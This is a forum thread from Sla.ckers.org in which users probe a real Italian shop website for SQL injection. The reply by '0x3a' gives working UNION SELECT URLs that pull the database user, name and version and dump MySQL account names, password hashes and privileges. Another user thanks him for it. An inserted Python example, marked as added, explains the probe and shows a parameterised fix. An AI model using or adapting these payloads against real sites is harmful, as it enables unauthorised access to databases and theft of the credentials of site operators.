Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
[SQLIA] How is it possible?
Posted by: Nerder
Date: April 23, 2012 12:17PM

I have tried this simple way:

http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+and+'lol'='lol'/ [TRUE]

http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+and+'lol'='asd'/ [FALSE]

I think that it's vulnerable but I'm not sure...
Could anyone solve my question?
Thx
Nerder
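
Why the two requests above answer differently, as an added example that is not part of the original thread or the site's code: it assumes the `id-` path segment is concatenated into a SQL `WHERE` clause, and shows the digits-only check plus bound parameter that makes the TRUE and FALSE requests indistinguishable. The Python/SQLite stand-in, the `products` table, the shortened path and all function names are assumptions.

```python
import re
import sqlite3

# Constructed sample data: an in-memory table standing in for the product catalogue.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
db.execute("INSERT INTO products VALUES (2343895, 'sample product')")

def segment_from_path(path):
    """Return the raw text after 'id-' in a '/dettaglio/id-.../' path ('+' read as space)."""
    m = re.search(r"/dettaglio/id-([^/]*)/?$", path)
    return m.group(1).replace("+", " ") if m else None

def lookup_vulnerable(path):
    """Deliberately vulnerable: the path segment is concatenated into the SQL text."""
    raw = segment_from_path(path)
    sql = "SELECT name FROM products WHERE id = " + raw
    return db.execute(sql).fetchall()

def lookup_hardened(path):
    """Allow-list the segment as ASCII digits only, then bind it as a parameter."""
    raw = segment_from_path(path)
    if raw is None or not re.fullmatch(r"[0-9]{1,18}", raw):
        return None  # caller answers with one fixed error page for every rejected input
    return db.execute("SELECT name FROM products WHERE id = ?", (int(raw),)).fetchall()

# Constructed paths; the conditions are the ones quoted in the post, the slug is shortened.
BASE = "/gadgets/x/dettaglio/id-2343895"
PROBES = {
    "plain": BASE + "/",
    "true": BASE + "+and+'lol'='lol'/",
    "false": BASE + "+and+'lol'='asd'/",
}

def differential(lookup):
    """Map each probe to whether the page would render a product."""
    return {name: bool(lookup(path)) for name, path in PROBES.items()}

if __name__ == "__main__":
    # Vulnerable: 'true' renders and 'false' does not, so the input reaches the SQL parser.
    print("vulnerable:", differential(lookup_vulnerable))
    # Hardened: both modified requests are rejected identically, leaving no oracle.
    print("hardened:  ", differential(lookup_hardened))
```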

Re: [SQLIA] How is it possible?
Posted by: 0x3a
Date: April 24, 2012 08:50AM

http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-0+uNioN+alL+sEleCT+1,concat(user(),0x3a,database(),0x3a,version())+--+/

http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+union+select+group_concat(DISTINCT+user,0x3a,password,file_priv,0x3a,host,0x3c6272202f3e),2+from+mysql.user--/

I hope this can help you.



Edited 1 time(s). Last edit at 04/24/2012 09:20AM by 0x3a.

Re: [SQLIA] How is it possible?
Posted by: chimung
Date: April 27, 2012 10:10PM

It's so cool! Tks 0x3a
